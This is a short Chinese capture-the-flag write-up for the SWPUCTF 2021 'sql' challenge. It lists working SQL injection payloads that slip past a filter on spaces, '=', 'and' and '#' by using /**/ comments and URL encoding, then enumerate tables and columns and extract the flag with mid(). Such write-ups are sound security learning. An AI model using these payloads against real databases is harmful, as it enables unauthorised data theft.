[SWPUCTF 2021 新生赛]sql

[SWPUCTF 2021 新生赛]sql-绕过

首先直接通过wllm=1' 发现有语句报错

之后直接开始手测规则发现屏蔽了

= 空格 + and or <> # 

空格的绕过方法很多，但是通过第一轮测试还发现一个问题就是最后的单引号必须为URL编码后的，编码前的通过BP发包过去还是会爆语法错误，具体原因不知道，希望以后有师傅能够解答

1'order/**/by/**/3%23 

之后就是走流程，由于版本不是8版本没有table所以用union select

-1'union/**/select/**/1,2,database()%23
-1'union/**/select/**/1,2,group_concat(table_name)from(information_schema.tables)where(table_schema)like'test_db'%23
# 没法用and但是没关系直接爆所有列
-1'union/**/select/**/1,2,group_concat(column_name)from(information_schema.columns)where(table_schema)like'test_db'%23
-1'union/**/select/**/1,2,group_concat(flag)from`LTLT_flag`%23

到最后一步发现只有一部分？？

没事测试一啊截断函数，发现sub、left、right都被屏蔽了，只能用mid,之后看wp发现还有reverse函数

mid()、substr()、left()、right()

-1'union/**/select/**/1,2,mid(group_concat(flag),15,15)from`LTLT_flag`%23
-1'union/**/select/**/1,2,mid(group_concat(flag),30,20)from`LTLT_flag`%23